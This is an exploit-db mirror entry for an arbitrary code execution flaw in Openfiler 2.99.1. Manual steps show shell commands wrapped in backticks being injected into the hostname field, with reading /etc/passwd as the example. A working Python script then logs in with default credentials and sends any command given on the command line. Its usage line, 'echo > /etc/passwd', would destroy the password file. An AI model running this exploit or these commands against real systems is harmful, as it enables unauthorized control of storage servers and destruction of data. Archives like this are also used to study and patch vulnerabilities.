bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/33247.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

85 lines
No EOL
2.3 KiB
Text
Raw Permalink Blame History

# Exploit Title: Arbitrary Code Execution in Openfiler
# Exploit author: Dolev Farhi @f1nhack
# Date 07/05/2014
# Vendor homepage: http://www.openfiler.com
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
Software Description
=====================
Openfiler is a network storage operating system. With the features we built into Openfiler, you can take advantage of file-based Network Attached Storage and block-based
Storage Area Networking functionality in a single cohesive framework.
Vulnerability Description
=========================
Arbitrary code execution
Steps to reproduce / PoC:
=========================
1.1. Login to Openfiler dashboard.
1.2. Under system tab -> Hostname
1.3. Enter any shell command you desire using the backticks ` `
e.g. `cat /etc/passwd`
1.4. the code reflects in the hostname value space
<-> PoC Video: https://www.youtube.com/watch?v=NzjB9U_0yLE&feature=youtu.be
#!/usr/bin/env python
# Exploit Title: Openfiler Remote Code Execution
# Date 21/12/2014
# Affected Software version: 2.99.1
# Alerted vendor: 7.5.14
# Quick and dirty exploit
# usage: python openfiler_RCE.py <Command>
# Author: Dolev Farhi @dolevff
import sys
import urllib
import urllib2
import cookielib
server = 'ip.add.re.ss'
username = 'openfiler'
password = 'password'
timeout = 6
command = '`' + ' '.join(sys.argv[1:]) + '`'
if len(sys.argv[1:]) == 0:
print 'Missing argument (command)'
print 'example: python openfilerRCE.py echo > /etc/passwd'
sys.exit(0)
try:
cj = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
login_data = urllib.urlencode({'username' : username, 'password' : password})
opener.open('https://' + server + ':446/account/login.html', login_data, timeout=timeout)
payload = urllib.urlencode({'hostname' : command,'netconf' : 'Update'})
url = 'https://%s:446/admin/system.html' % (server)
resp = opener.open(url)
if 'logout.html' in resp.read():
opener.open('https://' + server + ':446/admin/system.html', payload)
print ('Executed %s :-)' %(command))
sys.exit(0)
except urllib2.URLError, e:
print 'Error: %s' %(e.reason)
sys.exit(1)
except Exception, e:
print 'Error: possibily invalid credentials, try again.'
sys.exit(1)
Reference in a new issue View git blame Copy permalink